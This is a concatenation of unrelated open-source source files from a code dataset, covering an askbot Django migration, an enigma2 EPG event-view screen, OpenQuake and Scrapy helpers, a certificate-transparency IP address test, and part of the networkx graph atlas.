'revised_at': ('django.db.models.fields.DateTimeField', [], {}),
'revision': ('django.db.models.fields.PositiveIntegerField', [], {}),
'summary': ('django.db.models.fields.CharField', [], {'max_length': '300', 'blank': 'True'}),
'tagnames': ('django.db.models.fields.CharField', [], {'max_length': '125'}),
'text': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'askbot.questionview': {
'Meta': {'object_name': 'QuestionView'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'viewed'", 'to': "orm['askbot.Question']"}),
'when': ('django.db.models.fields.DateTimeField', [], {}),
'who': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'question_views'", 'to': "orm['auth.User']"})
},
'askbot.repute': {
'Meta': {'object_name': 'Repute', 'db_table': "u'repute'"},
'comment': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'negative': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'positive': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['askbot.Question']", 'null': 'True', 'blank': 'True'}),
'reputation': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'reputation_type': ('django.db.models.fields.SmallIntegerField', [], {}),
'reputed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'askbot.tag': {
'Meta': {'object_name': 'Tag', 'db_table': "u'tag'"},
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_tags'", 'to': "orm['auth.User']"}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'deleted_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'deleted_tags'", 'null': 'True', 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'used_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'askbot.vote': {
'Meta': {'unique_together': "(('content_type', 'object_id', 'user'),)", 'object_name': 'Vote', 'db_table': "u'vote'"},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'votes'", 'to': "orm['auth.User']"}),
'vote': ('django.db.models.fields.SmallIntegerField', [], {}),
'voted_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True', 'null': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'has_custom_avatar': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'hide_ignored_questions': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'tag_filter_setting': ('django.db.models.fields.CharField', [], {'default': "'ignored'", 'max_length': '16'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['askbot']
| gpl-3.0 |
Taapat/enigma2-openpli-vuplus | lib/python/Screens/EventView.py | 7 | 11653 | from Screen import Screen
from Screens.TimerEdit import TimerSanityConflict
from Screens.ChoiceBox import ChoiceBox
from Components.ActionMap import ActionMap
from Components.Button import Button
from Components.Label import Label
from Components.ScrollLabel import ScrollLabel
from Components.PluginComponent import plugins
from Components.TimerList import TimerList
from Components.UsageConfig import preferredTimerPath
from Components.Sources.ServiceEvent import ServiceEvent
from Components.Sources.Event import Event
from enigma import eEPGCache, eTimer, eServiceReference
from RecordTimer import RecordTimerEntry, parseEvent, AFTEREVENT
from TimerEntry import TimerEntry
from Plugins.Plugin import PluginDescriptor
from Tools.BoundFunction import boundFunction
from time import localtime
from Components.config import config
class EventViewBase:
ADD_TIMER = 0
REMOVE_TIMER = 1
def __init__(self, event, Ref, callback=None, similarEPGCB=None):
self.similarEPGCB = similarEPGCB
self.cbFunc = callback
self.currentService=Ref
self.isRecording = (not Ref.ref.flags & eServiceReference.isGroup) and Ref.ref.getPath()
self.event = event
self["Service"] = ServiceEvent()
self["Event"] = Event()
self["epg_description"] = ScrollLabel()
self["FullDescription"] = ScrollLabel()
self["datetime"] = Label()
self["channel"] = Label()
self["duration"] = Label()
self["key_red"] = Button("")
if similarEPGCB is not None:
self.SimilarBroadcastTimer = eTimer()
self.SimilarBroadcastTimer.callback.append(self.getSimilarEvents)
else:
self.SimilarBroadcastTimer = None
self.key_green_choice = self.ADD_TIMER
if self.isRecording:
self["key_green"] = Button("")
else:
self["key_green"] = Button(_("Add timer"))
self["key_yellow"] = Button("")
self["key_blue"] = Button("")
self["actions"] = ActionMap(["OkCancelActions", "EventViewActions"],
{
"cancel": self.close,
"ok": self.close,
"pageUp": self.pageUp,
"pageDown": self.pageDown,
"prevEvent": self.prevEvent,
"nextEvent": self.nextEvent,
"timerAdd": self.timerAdd,
"openSimilarList": self.openSimilarList,
"contextMenu": self.doContext,
})
self.onShown.append(self.onCreate)
def onCreate(self):
self.setService(self.currentService)
self.setEvent(self.event)
def prevEvent(self):
if self.cbFunc is not None:
self.cbFunc(self.setEvent, self.setService, -1)
def nextEvent(self):
if self.cbFunc is not None:
self.cbFunc(self.setEvent, self.setService, +1)
def removeTimer(self, timer):
timer.afterEvent = AFTEREVENT.NONE
self.session.nav.RecordTimer.removeEntry(timer)
self["key_green"].setText(_("Add timer"))
self.key_green_choice = self.ADD_TIMER
def timerAdd(self):
if self.isRecording:
return
event = self.event
serviceref = self.currentService
if event is None:
return
eventid = event.getEventId()
begin = event.getBeginTime()
end = begin + event.getDuration()
refstr = ':'.join(serviceref.ref.toString().split(':')[:11])
isRecordEvent = False
for timer in self.session.nav.RecordTimer.timer_list:
needed_ref = ':'.join(timer.service_ref.ref.toString().split(':')[:11]) == refstr
if needed_ref and timer.eit == eventid and (begin < timer.begin <= end or timer.begin <= begin <= timer.end):
isRecordEvent = True
break
elif needed_ref and timer.repeated and self.session.nav.RecordTimer.isInRepeatTimer(timer, event):
isRecordEvent = True
break
if isRecordEvent:
title_text = timer.repeated and _("Attention, this is repeated timer!\n") or ""
menu = [(_("Delete timer"), "delete"),(_("Edit timer"), "edit")]
buttons = ["red", "green"]
def timerAction(choice):
if choice is not None:
if choice[1] == "delete":
self.removeTimer(timer)
elif choice[1] == "edit":
self.session.openWithCallback(self.finishedEdit, TimerEntry, timer)
self.session.openWithCallback(timerAction, ChoiceBox, title=title_text + _("Select action for timer '%s'.") % timer.name, list=menu, keys=buttons)
else:
newEntry = RecordTimerEntry(self.currentService, checkOldTimers = True, dirname = preferredTimerPath(), *parseEvent(self.event))
self.session.openWithCallback(self.finishedAdd, TimerEntry, newEntry)
def finishedEdit(self, answer=None):
if answer[0]:
entry = answer[1]
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
for x in simulTimerList:
if x.setAutoincreaseEnd(entry):
self.session.nav.RecordTimer.timeChanged(x)
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
self.session.openWithCallback(self.finishedEdit, TimerSanityConflict, simulTimerList)
return
else:
self.session.nav.RecordTimer.timeChanged(entry)
if answer is not None and len(answer) > 1:
entry = answer[1]
if not entry.disabled:
self["key_green"].setText(_("Change timer"))
self.key_green_choice = self.REMOVE_TIMER
else:
self["key_green"].setText(_("Add timer"))
self.key_green_choice = self.ADD_TIMER
def finishedAdd(self, answer):
print "finished add"
if answer[0]:
entry = answer[1]
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
for x in simulTimerList:
if x.setAutoincreaseEnd(entry):
self.session.nav.RecordTimer.timeChanged(x)
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
if not entry.repeated and not config.recording.margin_before.value and not config.recording.margin_after.value and len(simulTimerList) > 1:
change_time = False
conflict_begin = simulTimerList[1].begin
conflict_end = simulTimerList[1].end
if conflict_begin == entry.end:
entry.end -= 30
change_time = True
elif entry.begin == conflict_end:
entry.begin += 30
change_time = True
elif entry.begin == conflict_begin and (entry.service_ref and entry.service_ref.ref and entry.service_ref.ref.flags & eServiceReference.isGroup):
entry.begin += 30
change_time = True
if change_time:
simulTimerList = self.session.nav.RecordTimer.record(entry)
if simulTimerList is not None:
self.session.openWithCallback(self.finishSanityCorrection, TimerSanityConflict, simulTimerList)
self["key_green"].setText(_("Change timer"))
self.key_green_choice = self.REMOVE_TIMER
else:
self["key_green"].setText(_("Add timer"))
self.key_green_choice = self.ADD_TIMER
print "Timeredit aborted"
def finishSanityCorrection(self, answer):
self.finishedAdd(answer)
def setService(self, service):
self.currentService=service
self["Service"].newService(service.ref)
if self.isRecording:
self["channel"].setText(_("Recording"))
else:
name = service.getServiceName()
if name is not None:
self["channel"].setText(name)
else:
self["channel"].setText(_("unknown service"))
def sort_func(self,x,y):
if x[1] < y[1]:
return -1
elif x[1] == y[1]:
return 0
else:
return 1
def setEvent(self, event):
self.event = event
self["Event"].newEvent(event)
if event is None:
return
text = event.getEventName()
short = event.getShortDescription()
ext = event.getExtendedDescription()
if short == text:
short = ""
if short and ext:
ext = short + "\n\n" + ext
elif short:
ext = short
if text and ext:
text += "\n\n"
text += ext
self.setTitle(event.getEventName())
self["epg_description"].setText(text)
self["FullDescription"].setText(ext)
self["datetime"].setText(event.getBeginTimeString())
self["duration"].setText(_("%d min")%(event.getDuration()/60))
self["key_red"].setText("")
if self.SimilarBroadcastTimer is not None:
self.SimilarBroadcastTimer.start(400,True)
serviceref = self.currentService
eventid = self.event.getEventId()
begin = event.getBeginTime()
end = begin + event.getDuration()
refstr = ':'.join(serviceref.ref.toString().split(':')[:11])
isRecordEvent = False
for timer in self.session.nav.RecordTimer.timer_list:
needed_ref = ':'.join(timer.service_ref.ref.toString().split(':')[:11]) == refstr
if needed_ref and (timer.eit == eventid and (begin < timer.begin <= end or timer.begin <= begin <= timer.end) or timer.repeated and self.session.nav.RecordTimer.isInRepeatTimer(timer, event)):
isRecordEvent = True
break
if isRecordEvent and self.key_green_choice != self.REMOVE_TIMER:
self["key_green"].setText(_("Change timer"))
self.key_green_choice = self.REMOVE_TIMER
elif not isRecordEvent and self.key_green_choice != self.ADD_TIMER:
self["key_green"].setText(_("Add timer"))
self.key_green_choice = self.ADD_TIMER
def pageUp(self):
self["epg_description"].pageUp()
self["FullDescription"].pageUp()
def pageDown(self):
self["epg_description"].pageDown()
self["FullDescription"].pageDown()
def getSimilarEvents(self):
# search similar broadcastings
if not self.event:
return
refstr = str(self.currentService)
id = self.event.getEventId()
epgcache = eEPGCache.getInstance()
ret = epgcache.search(('NB', 100, eEPGCache.SIMILAR_BROADCASTINGS_SEARCH, refstr, id))
if ret is not None:
text = '\n\n' + _('Similar broadcasts:')
ret.sort(self.sort_func)
for x in ret:
t = localtime(x[1])
text += '\n%d.%d.%d, %2d:%02d - %s'%(t[2], t[1], t[0], t[3], t[4], x[0])
descr = self["epg_description"]
descr.setText(descr.getText()+text)
descr = self["FullDescription"]
descr.setText(descr.getText()+text)
self["key_red"].setText(_("Similar"))
def openSimilarList(self):
if self.similarEPGCB is not None and self["key_red"].getText():
id = self.event and self.event.getEventId()
refstr = str(self.currentService)
if id is not None:
self.similarEPGCB(id, refstr)
def doContext(self):
if self.event:
text = _("Select action")
menu = [(p.name, boundFunction(self.runPlugin, p)) for p in plugins.getPlugins(where = PluginDescriptor.WHERE_EVENTINFO) \
if 'servicelist' not in p.__call__.func_code.co_varnames \
if 'selectedevent' not in p.__call__.func_code.co_varnames ]
if len(menu) == 1:
menu and menu[0][1]()
elif len(menu) > 1:
def boxAction(choice):
if choice:
choice[1]()
text += ": %s" % self.event.getEventName()
self.session.openWithCallback(boxAction, ChoiceBox, title=text, list=menu, windowTitle=_("Event view context menu"))
def runPlugin(self, plugin):
plugin(session=self.session, service=self.currentService, event=self.event, eventName=self.event.getEventName())
class EventViewSimple(Screen, EventViewBase):
def __init__(self, session, Event, Ref, callback=None, similarEPGCB=None):
Screen.__init__(self, session)
self.skinName = "EventView"
EventViewBase.__init__(self, Event, Ref, callback, similarEPGCB)
class EventViewEPGSelect(Screen, EventViewBase):
def __init__(self, session, Event, Ref, callback=None, singleEPGCB=None, multiEPGCB=None, similarEPGCB=None):
Screen.__init__(self, session)
self.skinName = "EventView"
self.singleEPGCB = singleEPGCB
self.multiEPGCB = multiEPGCB
EventViewBase.__init__(self, Event, Ref, callback, similarEPGCB)
self["key_yellow"].setText(_("Single EPG"))
self["key_blue"].setText(_("Multi EPG"))
self["epgactions"] = ActionMap(["EventViewEPGActions"],
{
"openSingleServiceEPG": self.openSingleEPG,
"openMultiServiceEPG": self.openMultiEPG,
})
def openSingleEPG(self):
self.hide()
self.singleEPGCB()
self.close()
def openMultiEPG(self):
self.hide()
self.multiEPGCB()
self.close()
| gpl-2.0 |
larsbutler/oq-hazardlib | openquake/hazardlib/calc/__init__.py | 4 | 1250 | # The Hazard Library
# Copyright (C) 2012-2014, GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Package :mod:`openquake.hazardlib.calc` contains hazard calculator modules
and utilities for them, such as :mod:`~openquake.hazardlib.calc.filters`.
"""
from openquake.hazardlib.calc.hazard_curve import hazard_curves
from openquake.hazardlib.calc.gmf import ground_motion_fields
from openquake.hazardlib.calc.stochastic import stochastic_event_set
# from disagg we want to import main calc function
# as well as all the pmf extractors
from openquake.hazardlib.calc.disagg import *
from openquake.hazardlib.calc import filters
| agpl-3.0 |
Lucifer-Kim/scrapy | scrapy/utils/testsite.py | 93 | 1232 | from __future__ import print_function
from six.moves.urllib.parse import urljoin
from twisted.internet import reactor
from twisted.web import server, resource, static, util
class SiteTest(object):
def setUp(self):
super(SiteTest, self).setUp()
self.site = reactor.listenTCP(0, test_site(), interface="127.0.0.1")
self.baseurl = "http://localhost:%d/" % self.site.getHost().port
def tearDown(self):
super(SiteTest, self).tearDown()
self.site.stopListening()
def url(self, path):
return urljoin(self.baseurl, path)
def test_site():
r = resource.Resource()
r.putChild("text", static.Data("Works", "text/plain"))
r.putChild("html", static.Data("<body><p class='one'>Works</p><p class='two'>World</p></body>", "text/html"))
r.putChild("enc-gb18030", static.Data("<p>gb18030 encoding</p>", "text/html; charset=gb18030"))
r.putChild("redirect", util.Redirect("/redirected"))
r.putChild("redirected", static.Data("Redirected here", "text/plain"))
return server.Site(r)
if __name__ == '__main__':
port = reactor.listenTCP(0, test_site(), interface="127.0.0.1")
print("http://localhost:%d/" % port.getHost().port)
reactor.run()
| bsd-3-clause |
dobbymoodge/origin | vendor/github.com/google/certificate-transparency/python/ct/cert_analysis/ip_addresses_test.py | 18 | 2888 | #!/usr/bin/env python
import unittest
import mock
from ct.cert_analysis import base_check_test
from ct.cert_analysis import ip_addresses
from ct.crypto import cert
class IpAddressesTest(base_check_test.BaseCheckTest):
class FakeIPAddress(object):
def __init__(self, *args):
self.octets = args
def as_octets(self):
return self.octets
def test_corrupt_extension(self):
certificate = mock.MagicMock()
certificate.subject_ip_addresses = mock.Mock(
side_effect=cert.CertificateError("Boom!"))
check = ip_addresses.CheckCorruptIpAddresses()
result = check.check(certificate)
self.assertObservationIn(ip_addresses.CorruptIPAddress(), result)
def test_private_ipv4(self):
certificate = mock.MagicMock()
certificate.subject_ip_addresses = mock.Mock(return_value=
[self.FakeIPAddress(10, 0, 0, 5),
self.FakeIPAddress(192, 168, 0, 1),
self.FakeIPAddress(172, 16, 5, 5),
self.FakeIPAddress(172, 31, 3, 3),
self.FakeIPAddress(172, 27, 42, 4)])
check = ip_addresses.CheckPrivateIpAddresses()
result = check.check(certificate)
self.assertEqual(len(result), 5)
def test_not_private_ipv4(self):
certificate = mock.MagicMock()
certificate.subject_ip_addresses = mock.Mock(return_value=
[self.FakeIPAddress(11, 0, 0, 5),
self.FakeIPAddress(172, 32, 0, 5),
self.FakeIPAddress(172, 5, 1, 1),
self.FakeIPAddress(192, 15, 0, 0)])
check = ip_addresses.CheckPrivateIpAddresses()
result = check.check(certificate)
self.assertEqual(len(result), 0)
def test_not_private_ipv6(self):
certificate = mock.MagicMock()
certificate.subject_ip_addresses = mock.Mock(return_value=[
self.FakeIPAddress(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13,
14, 15)])
check = ip_addresses.CheckPrivateIpAddresses()
result = check.check(certificate)
self.assertEqual(len(result), 0)
def test_private_ipv6(self):
certificate = mock.MagicMock()
certificate.subject_ip_addresses = mock.Mock(return_value=[
self.FakeIPAddress(253, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12,
13, 14, 15)])
check = ip_addresses.CheckPrivateIpAddresses()
result = check.check(certificate)
self.assertEqual(len(result), 1)
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
goyalankit/po-compiler | object_files/networkx-1.8.1/networkx/generators/atlas.py | 49 | 214318 | """
Generators for the small graph atlas.
See
"An Atlas of Graphs" by Ronald C. Read and Robin J. Wilson,
Oxford University Press, 1998.
Because of its size, this module is not imported by default.
"""
# Copyright (C) 2004-2008 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
__author__ = """Pieter Swart (swart@lanl.gov)"""
__all__ = ['graph_atlas_g']
from networkx.generators.small import make_small_graph
def graph_atlas_g():
"""
Return the list [G0,G1,...,G1252] of graphs as named in the Graph Atlas.
G0,G1,...,G1252 are all graphs with up to 7 nodes.
The graphs are listed:
1. in increasing order of number of nodes;
2. for a fixed number of nodes,
in increasing order of the number of edges;
3. for fixed numbers of nodes and edges,
in increasing order of the degree sequence,
for example 111223 < 112222;
4. for fixed degree sequence, in increasing number of automorphisms.
Note that indexing is set up so that for
GAG=graph_atlas_g(), then
G123=GAG[123] and G[0]=empty_graph(0)
"""
descr_list=[
['edgelist', 'G0', 0, []],
['edgelist', 'G1', 1, []],
['edgelist', 'G2', 2, []],
['edgelist', 'G3', 2, [[1, 2]]],
['edgelist', 'G4', 3, []],
['edgelist', 'G5', 3, [[2, 3]]],
['edgelist', 'G6', 3, [[1, 2], [1, 3]]],
['edgelist', 'G7', 3, [[1, 2], [1, 3], [2, 3]]],
['edgelist', 'G8', 4, []],
['edgelist', 'G9', 4, [[4, 3]]],
['edgelist', 'G10', 4, [[4, 3], [4, 2]]],
['edgelist', 'G11', 4, [[1, 2], [4, 3]]],
['edgelist', 'G12', 4, [[4, 3], [2, 3], [4, 2]]],
['edgelist', 'G13', 4, [[4, 1], [4, 2], [4, 3]]],
['edgelist', 'G14', 4, [[1, 2], [2, 3], [1, 4]]],
['edgelist', 'G15', 4, [[4, 3], [2, 3], [4, 2], [4, 1]]],
['edgelist', 'G16', 4, [[1, 2], [2, 3], [3, 4], [1, 4]]],
['edgelist', 'G17', 4, [[1, 2], [1, 3], [1, 4], [2, 3], [3, 4]]],
['edgelist', 'G18', 4, [[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3]]],
['edgelist', 'G19', 5, []],
['edgelist', 'G20', 5, [[5, 4]]],
['edgelist', 'G21', 5, [[2, 3], [1, 2]]],
['edgelist', 'G22', 5, [[1, 3], [5, 4]]],
['edgelist', 'G23', 5, [[2, 3], [1, 2], [3, 1]]],
['edgelist', 'G24', 5, [[5, 4], [4, 3], [4, 2]]],
['edgelist', 'G25', 5, [[4, 3], [5, 4], [1, 5]]],
['edgelist', 'G26', 5, [[2, 3], [1, 2], [5, 4]]],
['edgelist', 'G27', 5, [[5, 4], [2, 3], [4, 2], [4, 3]]],
['edgelist', 'G28', 5, [[1, 4], [2, 1], [3, 2], [4, 3]]],
['edgelist', 'G29', 5, [[5, 4], [5, 1], [5, 2], [5, 3]]],
['edgelist', 'G30', 5, [[5, 1], [4, 2], [5, 4], [4, 3]]],
['edgelist', 'G31', 5, [[3, 4], [2, 3], [1, 2], [5, 1]]],
['edgelist', 'G32', 5, [[2, 3], [1, 2], [3, 1], [5, 4]]],
['edgelist', 'G33', 5, [[1, 4], [3, 1], [4, 3], [2, 1], [3, 2]]],
['edgelist', 'G34', 5, [[5, 3], [5, 4], [3, 4], [5, 2], [5, 1]]],
['edgelist', 'G35', 5, [[1, 2], [2, 3], [3, 4], [1, 5], [1, 3]]],
['edgelist', 'G36', 5, [[5, 1], [2, 3], [5, 4], [4, 3], [4, 2]]],
['edgelist', 'G37', 5, [[2, 1], [5, 2], [3, 5], [4, 3], [2, 4]]],
['edgelist', 'G38', 5, [[1, 2], [2, 3], [3, 4], [4, 5], [1, 5]]],
['edgelist', 'G39', 5, [[2, 1], [5, 2], [5, 1], [1, 4], [2, 4], [4, 5]]],
['edgelist', 'G40', 5, [[2, 1], [5, 2], [3, 5], [4, 3], [2, 4], [3, 2]]],
['edgelist', 'G41', 5, [[2, 1], [5, 2], [3, 5], [4, 3], [2, 4], [4, 5]]],
['edgelist', 'G42', 5, [[1, 2], [5, 4], [3, 4], [5, 3], [5, 1], [5, 2]]],
['edgelist', 'G43', 5, [[1, 5], [4, 1], [5, 4], [3, 4], [2, 3], [1, 2]]],
['edgelist', 'G44', 5, [[3, 2], [1, 3], [4, 1], [2, 4], [5, 2], [1, 5]]],
['edgelist',
'G45',
5,
[[5, 1], [2, 3], [5, 4], [4, 3], [4, 2], [5, 2], [3, 5]]],
['edgelist',
'G46',
5,
[[5, 2], [3, 5], [4, 3], [2, 4], [4, 5], [1, 4], [5, 1]]],
['edgelist',
'G47',
5,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 4], [5, 2]]],
['edgelist',
'G48',
5,
[[3, 2], [1, 3], [4, 1], [2, 4], [5, 2], [1, 5], [3, 5]]],
['edgelist',
'G49',
5,
[[2, 1], [5, 2], [3, 5], [4, 3], [2, 4], [5, 1], [4, 5], [1, 4]]],
['edgelist',
'G50',
5,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 1], [5, 2], [5, 3], [5, 4]]],
['edgelist',
'G51',
5,
[[1, 2], [4, 5], [1, 4], [1, 5], [2, 3], [2, 4], [2, 5], [3, 4], [3, 5]]],
['edgelist',
'G52',
5,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5]]],
['edgelist', 'G53', 6, []],
['edgelist', 'G54', 6, [[6, 5]]],
['edgelist', 'G55', 6, [[1, 4], [6, 5]]],
['edgelist', 'G56', 6, [[2, 4], [2, 3]]],
['edgelist', 'G57', 6, [[2, 4], [3, 2], [4, 3]]],
['edgelist', 'G58', 6, [[1, 4], [6, 1], [5, 1]]],
['edgelist', 'G59', 6, [[5, 4], [6, 5], [1, 6]]],
['edgelist', 'G60', 6, [[5, 4], [6, 2], [6, 3]]],
['edgelist', 'G61', 6, [[2, 3], [4, 1], [6, 5]]],
['edgelist', 'G62', 6, [[1, 4], [5, 1], [6, 5], [1, 6]]],
['edgelist', 'G63', 6, [[4, 1], [6, 4], [5, 6], [1, 5]]],
['edgelist', 'G64', 6, [[6, 2], [6, 4], [6, 3], [1, 6]]],
['edgelist', 'G65', 6, [[5, 4], [4, 2], [5, 1], [4, 3]]],
['edgelist', 'G66', 6, [[1, 3], [2, 4], [3, 2], [6, 4]]],
['edgelist', 'G67', 6, [[2, 4], [3, 2], [4, 3], [1, 6]]],
['edgelist', 'G68', 6, [[2, 3], [1, 4], [6, 1], [5, 1]]],
['edgelist', 'G69', 6, [[5, 6], [2, 3], [1, 6], [4, 5]]],
['edgelist', 'G70', 6, [[1, 3], [5, 1], [4, 2], [6, 4]]],
['edgelist', 'G71', 6, [[4, 1], [6, 4], [5, 6], [1, 5], [6, 1]]],
['edgelist', 'G72', 6, [[6, 4], [4, 2], [4, 3], [5, 4], [5, 6]]],
['edgelist', 'G73', 6, [[6, 4], [6, 5], [3, 4], [4, 5], [1, 5]]],
['edgelist', 'G74', 6, [[5, 4], [2, 3], [5, 1], [4, 3], [4, 2]]],
['edgelist', 'G75', 6, [[2, 5], [4, 5], [5, 1], [3, 2], [4, 3]]],
['edgelist', 'G76', 6, [[1, 2], [2, 3], [3, 4], [4, 5], [1, 5]]],
['edgelist', 'G77', 6, [[6, 4], [6, 5], [6, 1], [6, 2], [6, 3]]],
['edgelist', 'G78', 6, [[2, 5], [6, 2], [2, 1], [3, 2], [3, 4]]],
['edgelist', 'G79', 6, [[1, 2], [4, 5], [1, 3], [4, 1], [6, 4]]],
['edgelist', 'G80', 6, [[2, 1], [3, 2], [3, 5], [2, 4], [6, 4]]],
['edgelist', 'G81', 6, [[5, 4], [1, 6], [5, 1], [4, 3], [4, 2]]],
['edgelist', 'G82', 6, [[2, 3], [1, 2], [5, 6], [2, 4], [3, 4]]],
['edgelist', 'G83', 6, [[1, 2], [1, 6], [3, 4], [4, 5], [5, 6]]],
['edgelist', 'G84', 6, [[5, 4], [6, 2], [6, 3], [1, 4], [5, 1]]],
['edgelist', 'G85', 6, [[2, 3], [4, 1], [6, 4], [5, 6], [1, 5]]],
['edgelist', 'G86', 6, [[1, 4], [6, 1], [5, 6], [4, 5], [6, 4], [5, 1]]],
